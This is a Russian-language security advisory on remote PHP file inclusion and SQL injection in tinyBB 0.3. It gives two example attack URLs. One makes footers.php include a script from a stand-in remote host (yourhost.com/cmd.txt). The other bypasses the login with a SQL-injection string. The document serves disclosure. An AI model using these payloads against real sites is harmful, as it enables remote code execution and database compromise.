PHP-инклюдинг и SQL-инъекция в tinyBB

Дата публикации:
05.06.2006
Всего просмотров:
1124
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2739
CVE-2006-2740
CVE-2006-2741
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
tinyBB 0.x
Уязвимые версии: tinyBB 0.3, возможно другие версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести SQL-инъекцию и выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tinybb_footers" в сценарии footers.php. Удаленный пользователь может выполнить произвольный PHP-сценарий на целевой системе. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "username" и "password" в сценарии login_form.php, и параметре "q" в сценарии forgot.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должны быть отключена. Пример:

http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

URL производителя: www.epicdesigns.co.uk/projects/tinybb.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: tinyBB <= 0.3 Multiple Remote Vulnerabilities

или введите имя

CAPTCHA